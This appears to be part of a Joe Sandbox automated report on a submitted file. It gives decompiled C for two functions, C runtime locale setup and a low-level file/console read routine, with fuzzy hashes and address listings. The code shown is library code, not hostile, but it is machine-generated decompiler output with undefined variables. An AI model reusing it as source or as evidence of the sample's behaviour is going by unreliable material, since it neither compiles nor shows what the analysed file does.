                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                          • Opcode ID: c0e63cf3f639d0be8432e70056e4e2c84f0a3e8067a5c770489be1118a711e7d
                                                                                                                                                                          • Instruction ID: 117add30c0b4be048b96b1b66ceee5303cf32b64f3e4ec0f3850522e86d8066e
                                                                                                                                                                          • Opcode Fuzzy Hash: c0e63cf3f639d0be8432e70056e4e2c84f0a3e8067a5c770489be1118a711e7d
                                                                                                                                                                          • Instruction Fuzzy Hash: 09316DB26047089FEB20ABB8F985B5673E8BF14390F148429E699D71E1DF31EC85CB10
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0CC9E Relevance: 18.4, APIs: 12, Instructions: 373COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                          			E00A0CC9E(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				signed int _t106;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t126;
				signed int _t130;
				signed int _t134;
				signed int _t138;
				signed int _t142;
				signed int _t146;
				signed int _t150;
				signed int _t154;
				signed int _t158;
				signed int _t162;
				signed int _t166;
				signed int _t170;
				signed int _t174;
				signed int _t178;
				signed int _t182;
				signed int _t186;
				signed int _t190;
				char _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				void* _t225;
				char* _t227;
				signed int _t228;
				signed int _t232;
				signed int _t233;
				intOrPtr _t234;
				void* _t235;
				void* _t237;
				char* _t258;

				_t225 = __edx;
				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t235 = E00A04422(1, 0x50);
					_v8 = _t235;
					E00A0447F(0);
					if(_t235 != 0) {
						_t228 = E00A04422(1, 4);
						_v12 = _t228;
						E00A0447F(0);
						if(_t228 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0xa44bf0, _t212 << 2);
								L24:
								_t237 = _v8;
								_t232 = _v16;
								 *_t237 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t232 != 0) {
									 *_t232 = 1;
								}
								goto L26;
							}
							_t233 = E00A04422(1, 4);
							_v16 = _t233;
							E00A0447F(0);
							if(_t233 != 0) {
								_t234 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t235 + 0xc; // 0xc
								_t116 = E00A06F5A(_t225);
								_t118 = E00A06F5A(_t225,  &_v28, 1, _t234, 0x14, _v8 + 0x10,  &_v28);
								_t122 = E00A06F5A(_t225,  &_v28, 1, _t234, 0x16, _v8 + 0x14, 1);
								_t126 = E00A06F5A(_t225,  &_v28, 1, _t234, 0x17, _v8 + 0x18, _t234);
								_v20 = _v8 + 0x1c;
								_t130 = E00A06F5A(_t225,  &_v28, 1, _t234, 0x18, _v8 + 0x1c, 0x15);
								_t134 = E00A06F5A(_t225,  &_v28, 1, _t234, 0x50, _v8 + 0x20, _t14);
								_t138 = E00A06F5A(_t225);
								_t142 = E00A06F5A(_t225,  &_v28, 0, _t234, 0x1a, _v8 + 0x28,  &_v28);
								_t146 = E00A06F5A(_t225,  &_v28, 0, _t234, 0x19, _v8 + 0x29, 1);
								_t150 = E00A06F5A(_t225,  &_v28, 0, _t234, 0x54, _v8 + 0x2a, _t234);
								_t154 = E00A06F5A(_t225,  &_v28, 0, _t234, 0x55, _v8 + 0x2b, 0x51);
								_t158 = E00A06F5A(_t225,  &_v28, 0, _t234, 0x56, _v8 + 0x2c, _v8 + 0x24);
								_t162 = E00A06F5A(_t225);
								_t166 = E00A06F5A(_t225,  &_v28, 0, _t234, 0x52, _v8 + 0x2e,  &_v28);
								_t170 = E00A06F5A(_t225,  &_v28, 0, _t234, 0x53, _v8 + 0x2f, 0);
								_t174 = E00A06F5A(_t225,  &_v28, 2, _t234, 0x15, _v8 + 0x38, _t234);
								_t178 = E00A06F5A(_t225,  &_v28, 2, _t234, 0x14, _v8 + 0x3c, 0x57);
								_t182 = E00A06F5A(_t225,  &_v28, 2, _t234, 0x16, _v8 + 0x40, _v8 + 0x2d);
								_push(_v8 + 0x44);
								_push(0x17);
								_push(_t234);
								_t186 = E00A06F5A(_t225);
								_t190 = E00A06F5A(_t225,  &_v28, 2, _t234, 0x50, _v8 + 0x48,  &_v28);
								if((E00A06F5A(_t225,  &_v28, 2, _t234, 0x51, _v8 + 0x4c, 2) | _t116 | _t118 | _t122 | _t126 | _t130 | _t134 | _t138 | _t142 | _t146 | _t150 | _t154 | _t158 | _t162 | _t166 | _t170 | _t174 | _t178 | _t182 | _t186 | _t190) == 0) {
									_t227 =  *_v20;
									while(1) {
										_t196 =  *_t227;
										if(_t196 == 0) {
											break;
										}
										_t61 = _t196 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t196 != 0x3b) {
												L16:
												_t227 = _t227 + 1;
												continue;
											}
											_t258 = _t227;
											do {
												_t222 =  *((intOrPtr*)(_t258 + 1));
												 *_t258 = _t222;
												_t258 = _t258 + 1;
											} while (_t222 != 0);
											continue;
										}
										 *_t227 = _t221;
										goto L16;
									}
									goto L24;
								}
								E00A0CBA0(_v8);
								E00A0447F(_v8);
								E00A0447F(_v12);
								E00A0447F(_v16);
								goto L4;
							}
							E00A0447F(_t235);
							E00A0447F(_v12);
							L7:
							goto L4;
						}
						E00A0447F(_t235);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t232 = 0;
					_v12 = 0;
					_t237 = 0xa44bf0;
					L26:
					_t106 =  *(_t209 + 0x84);
					if(_t106 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t106 | 0xffffffff) == 0) {
							E00A0447F( *(_t209 + 0x88));
							E00A0447F( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t232;
					 *(_t209 + 0x88) = _t237;
					return 0;
				}
			}












































                                                                                                                                                                          0x00a0cc9e
                                                                                                                                                                          0x00a0cca7
                                                                                                                                                                          0x00a0ccae
                                                                                                                                                                          0x00a0ccb1
                                                                                                                                                                          0x00a0ccb4
                                                                                                                                                                          0x00a0ccbd
                                                                                                                                                                          0x00a0ccdf
                                                                                                                                                                          0x00a0cce3
                                                                                                                                                                          0x00a0cce6
                                                                                                                                                                          0x00a0ccf0
                                                                                                                                                                          0x00a0cd03
                                                                                                                                                                          0x00a0cd07
                                                                                                                                                                          0x00a0cd0a
                                                                                                                                                                          0x00a0cd14
                                                                                                                                                                          0x00a0cd26
                                                                                                                                                                          0x00a0cfb8
                                                                                                                                                                          0x00a0cfb9
                                                                                                                                                                          0x00a0cfbb
                                                                                                                                                                          0x00a0cfc3
                                                                                                                                                                          0x00a0cfc7
                                                                                                                                                                          0x00a0cfcc
                                                                                                                                                                          0x00a0cfd7
                                                                                                                                                                          0x00a0cfe3
                                                                                                                                                                          0x00a0cfef
                                                                                                                                                                          0x00a0cffb
                                                                                                                                                                          0x00a0d001
                                                                                                                                                                          0x00a0d005
                                                                                                                                                                          0x00a0d007
                                                                                                                                                                          0x00a0d007
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0d005
                                                                                                                                                                          0x00a0cd35
                                                                                                                                                                          0x00a0cd39
                                                                                                                                                                          0x00a0cd3c
                                                                                                                                                                          0x00a0cd46
                                                                                                                                                                          0x00a0cd5a
                                                                                                                                                                          0x00a0cd60
                                                                                                                                                                          0x00a0cd6d
                                                                                                                                                                          0x00a0cd84
                                                                                                                                                                          0x00a0cd9b
                                                                                                                                                                          0x00a0cdb2
                                                                                                                                                                          0x00a0cdc2
                                                                                                                                                                          0x00a0cdcf
                                                                                                                                                                          0x00a0cde6
                                                                                                                                                                          0x00a0cdfd
                                                                                                                                                                          0x00a0ce14
                                                                                                                                                                          0x00a0ce2e
                                                                                                                                                                          0x00a0ce45
                                                                                                                                                                          0x00a0ce5c
                                                                                                                                                                          0x00a0ce73
                                                                                                                                                                          0x00a0ce8d
                                                                                                                                                                          0x00a0cea4
                                                                                                                                                                          0x00a0cebb
                                                                                                                                                                          0x00a0ced2
                                                                                                                                                                          0x00a0ceec
                                                                                                                                                                          0x00a0cf03
                                                                                                                                                                          0x00a0cf10
                                                                                                                                                                          0x00a0cf11
                                                                                                                                                                          0x00a0cf13
                                                                                                                                                                          0x00a0cf1a
                                                                                                                                                                          0x00a0cf31
                                                                                                                                                                          0x00a0cf55
                                                                                                                                                                          0x00a0cf83
                                                                                                                                                                          0x00a0cf92
                                                                                                                                                                          0x00a0cf92
                                                                                                                                                                          0x00a0cf96
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0cf87
                                                                                                                                                                          0x00a0cf87
                                                                                                                                                                          0x00a0cf8d
                                                                                                                                                                          0x00a0cf9c
                                                                                                                                                                          0x00a0cf91
                                                                                                                                                                          0x00a0cf91
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0cf91
                                                                                                                                                                          0x00a0cf9e
                                                                                                                                                                          0x00a0cfa0
                                                                                                                                                                          0x00a0cfa0
                                                                                                                                                                          0x00a0cfa3
                                                                                                                                                                          0x00a0cfa5
                                                                                                                                                                          0x00a0cfa8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0cfac
                                                                                                                                                                          0x00a0cf8f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0cf8f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0cf98
                                                                                                                                                                          0x00a0cf5b
                                                                                                                                                                          0x00a0cf61
                                                                                                                                                                          0x00a0cf6a
                                                                                                                                                                          0x00a0cf73
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0cf78
                                                                                                                                                                          0x00a0cd49
                                                                                                                                                                          0x00a0cd52
                                                                                                                                                                          0x00a0cd1c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0cd1c
                                                                                                                                                                          0x00a0cd17
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0cd17
                                                                                                                                                                          0x00a0ccf2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ccc7
                                                                                                                                                                          0x00a0ccc7
                                                                                                                                                                          0x00a0ccc9
                                                                                                                                                                          0x00a0cccc
                                                                                                                                                                          0x00a0d009
                                                                                                                                                                          0x00a0d009
                                                                                                                                                                          0x00a0d011
                                                                                                                                                                          0x00a0d013
                                                                                                                                                                          0x00a0d013
                                                                                                                                                                          0x00a0d01b
                                                                                                                                                                          0x00a0d020
                                                                                                                                                                          0x00a0d024
                                                                                                                                                                          0x00a0d02c
                                                                                                                                                                          0x00a0d034
                                                                                                                                                                          0x00a0d03a
                                                                                                                                                                          0x00a0d024
                                                                                                                                                                          0x00a0d03e
                                                                                                                                                                          0x00a0d043
                                                                                                                                                                          0x00a0d049
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0d049

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                          • Opcode ID: 160d6e3bd79ed1ac133094c1e81565f09d0f4220444c06989c3b8b46b238217d
                                                                                                                                                                          • Instruction ID: cd284b907e505db94e12d7cc61e20c2a67be893cda08495830aec13d4ae446d1
                                                                                                                                                                          • Opcode Fuzzy Hash: 160d6e3bd79ed1ac133094c1e81565f09d0f4220444c06989c3b8b46b238217d
                                                                                                                                                                          • Instruction Fuzzy Hash: 20C136B2E4020AAFDB20DB98ED82FDE77F8AB08714F144165FB49EB2C2D6709D518750
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A09296 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                          			E00A09296(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E009FEB98(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E009FEBAB( *_t137))) = 9;
						L60:
						_t139 = E009FCBCF();
						goto L61;
					}
					__eflags = _t198 -  *0xa46728; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0xa46528 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E009FEB98(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E009FEBAB(__eflags))) = 0x16;
								E009FCBCF();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E00A04E1F(_t154);
								E00A0447F(0);
								E00A0447F(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E00A097E9(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0xa46528 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0xa46528 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0xa46528 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0xa46528 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0xa46528 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0xa46528 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0xa46528 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E00A10D41(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E009FEB75(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E009FEBAB(__eflags))) = 9;
											 *(E009FEB98(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0xa46528 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E00A08E01();
												} else {
													_t170 = E00A09107();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E00A08FB0(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0xa46528 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t108 =  &_v28; // 0xa
									_t174 = GetConsoleMode( *_t108,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E009FEBAB(__eflags))) = 0xc;
									 *(E009FEB98(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E00A0447F(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0xa46528 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E009FEB98(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E009FEBAB(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E009FEB98(_t246)) =  *_t197 & 0x00000000;
					_t139 = E009FEBAB(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}





















































                                                                                                                                                                          0x00a0929f
                                                                                                                                                                          0x00a092a3
                                                                                                                                                                          0x00a092a6
                                                                                                                                                                          0x00a092c0
                                                                                                                                                                          0x00a092c2
                                                                                                                                                                          0x00a09627
                                                                                                                                                                          0x00a09627
                                                                                                                                                                          0x00a0962c
                                                                                                                                                                          0x00a0962c
                                                                                                                                                                          0x00a09634
                                                                                                                                                                          0x00a0963a
                                                                                                                                                                          0x00a0963a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0963a
                                                                                                                                                                          0x00a092c8
                                                                                                                                                                          0x00a092ce
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a092d8
                                                                                                                                                                          0x00a092de
                                                                                                                                                                          0x00a092e1
                                                                                                                                                                          0x00a092e4
                                                                                                                                                                          0x00a092ee
                                                                                                                                                                          0x00a092f1
                                                                                                                                                                          0x00a092f4
                                                                                                                                                                          0x00a092f8
                                                                                                                                                                          0x00a092fa
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a09300
                                                                                                                                                                          0x00a09303
                                                                                                                                                                          0x00a09309
                                                                                                                                                                          0x00a09323
                                                                                                                                                                          0x00a09325
                                                                                                                                                                          0x00a09623
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a09623
                                                                                                                                                                          0x00a0932b
                                                                                                                                                                          0x00a0932e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a09334
                                                                                                                                                                          0x00a09338
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0933e
                                                                                                                                                                          0x00a09341
                                                                                                                                                                          0x00a09345
                                                                                                                                                                          0x00a0934c
                                                                                                                                                                          0x00a0934e
                                                                                                                                                                          0x00a0934e
                                                                                                                                                                          0x00a09351
                                                                                                                                                                          0x00a093a6
                                                                                                                                                                          0x00a093a8
                                                                                                                                                                          0x00a0936e
                                                                                                                                                                          0x00a09373
                                                                                                                                                                          0x00a0937a
                                                                                                                                                                          0x00a09380
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a093aa
                                                                                                                                                                          0x00a093ac
                                                                                                                                                                          0x00a093ad
                                                                                                                                                                          0x00a093af
                                                                                                                                                                          0x00a093b2
                                                                                                                                                                          0x00a093b4
                                                                                                                                                                          0x00a093b6
                                                                                                                                                                          0x00a093b8
                                                                                                                                                                          0x00a093b8
                                                                                                                                                                          0x00a093c3
                                                                                                                                                                          0x00a093c5
                                                                                                                                                                          0x00a093cc
                                                                                                                                                                          0x00a093d1
                                                                                                                                                                          0x00a093d4
                                                                                                                                                                          0x00a093d7
                                                                                                                                                                          0x00a093d9
                                                                                                                                                                          0x00a093fd
                                                                                                                                                                          0x00a09405
                                                                                                                                                                          0x00a09408
                                                                                                                                                                          0x00a0940f
                                                                                                                                                                          0x00a09416
                                                                                                                                                                          0x00a0941a
                                                                                                                                                                          0x00a0941c
                                                                                                                                                                          0x00a0941f
                                                                                                                                                                          0x00a09426
                                                                                                                                                                          0x00a09426
                                                                                                                                                                          0x00a09429
                                                                                                                                                                          0x00a0942b
                                                                                                                                                                          0x00a0942e
                                                                                                                                                                          0x00a09433
                                                                                                                                                                          0x00a09436
                                                                                                                                                                          0x00a0943f
                                                                                                                                                                          0x00a09443
                                                                                                                                                                          0x00a09446
                                                                                                                                                                          0x00a09448
                                                                                                                                                                          0x00a0944e
                                                                                                                                                                          0x00a09450
                                                                                                                                                                          0x00a09459
                                                                                                                                                                          0x00a0945a
                                                                                                                                                                          0x00a0945c
                                                                                                                                                                          0x00a09460
                                                                                                                                                                          0x00a09461
                                                                                                                                                                          0x00a09465
                                                                                                                                                                          0x00a09468
                                                                                                                                                                          0x00a09472
                                                                                                                                                                          0x00a09477
                                                                                                                                                                          0x00a0947a
                                                                                                                                                                          0x00a09489
                                                                                                                                                                          0x00a0948d
                                                                                                                                                                          0x00a09490
                                                                                                                                                                          0x00a09492
                                                                                                                                                                          0x00a09494
                                                                                                                                                                          0x00a09496
                                                                                                                                                                          0x00a0949b
                                                                                                                                                                          0x00a0949d
                                                                                                                                                                          0x00a094a1
                                                                                                                                                                          0x00a094a2
                                                                                                                                                                          0x00a094a8
                                                                                                                                                                          0x00a094b2
                                                                                                                                                                          0x00a094b3
                                                                                                                                                                          0x00a094b6
                                                                                                                                                                          0x00a094bb
                                                                                                                                                                          0x00a094be
                                                                                                                                                                          0x00a094cd
                                                                                                                                                                          0x00a094d1
                                                                                                                                                                          0x00a094d4
                                                                                                                                                                          0x00a094d6
                                                                                                                                                                          0x00a094d8
                                                                                                                                                                          0x00a094da
                                                                                                                                                                          0x00a094dc
                                                                                                                                                                          0x00a094e2
                                                                                                                                                                          0x00a094e2
                                                                                                                                                                          0x00a094e3
                                                                                                                                                                          0x00a094f2
                                                                                                                                                                          0x00a094f5
                                                                                                                                                                          0x00a094f6
                                                                                                                                                                          0x00a094f6
                                                                                                                                                                          0x00a094da
                                                                                                                                                                          0x00a094d6
                                                                                                                                                                          0x00a094be
                                                                                                                                                                          0x00a09496
                                                                                                                                                                          0x00a09492
                                                                                                                                                                          0x00a0947a
                                                                                                                                                                          0x00a09450
                                                                                                                                                                          0x00a09448
                                                                                                                                                                          0x00a094fc
                                                                                                                                                                          0x00a09502
                                                                                                                                                                          0x00a09504
                                                                                                                                                                          0x00a09577
                                                                                                                                                                          0x00a09577
                                                                                                                                                                          0x00a0957b
                                                                                                                                                                          0x00a0958b
                                                                                                                                                                          0x00a09591
                                                                                                                                                                          0x00a09593
                                                                                                                                                                          0x00a095ef
                                                                                                                                                                          0x00a095ef
                                                                                                                                                                          0x00a095f7
                                                                                                                                                                          0x00a095f8
                                                                                                                                                                          0x00a095fa
                                                                                                                                                                          0x00a09613
                                                                                                                                                                          0x00a09616
                                                                                                                                                                          0x00a09553
                                                                                                                                                                          0x00a09554
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a09559
                                                                                                                                                                          0x00a0961c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0961c
                                                                                                                                                                          0x00a09601
                                                                                                                                                                          0x00a0960c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0960c
                                                                                                                                                                          0x00a09595
                                                                                                                                                                          0x00a09598
                                                                                                                                                                          0x00a0959b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0959d
                                                                                                                                                                          0x00a0959d
                                                                                                                                                                          0x00a095a0
                                                                                                                                                                          0x00a095a3
                                                                                                                                                                          0x00a095a6
                                                                                                                                                                          0x00a095ad
                                                                                                                                                                          0x00a095b2
                                                                                                                                                                          0x00a095b4
                                                                                                                                                                          0x00a095b8
                                                                                                                                                                          0x00a095d3
                                                                                                                                                                          0x00a095d7
                                                                                                                                                                          0x00a095d8
                                                                                                                                                                          0x00a095db
                                                                                                                                                                          0x00a095dc
                                                                                                                                                                          0x00a095e8
                                                                                                                                                                          0x00a095de
                                                                                                                                                                          0x00a095de
                                                                                                                                                                          0x00a095de
                                                                                                                                                                          0x00a095ba
                                                                                                                                                                          0x00a095ba
                                                                                                                                                                          0x00a095ba
                                                                                                                                                                          0x00a095c5
                                                                                                                                                                          0x00a095ca
                                                                                                                                                                          0x00a095cd
                                                                                                                                                                          0x00a095cd
                                                                                                                                                                          0x00000000
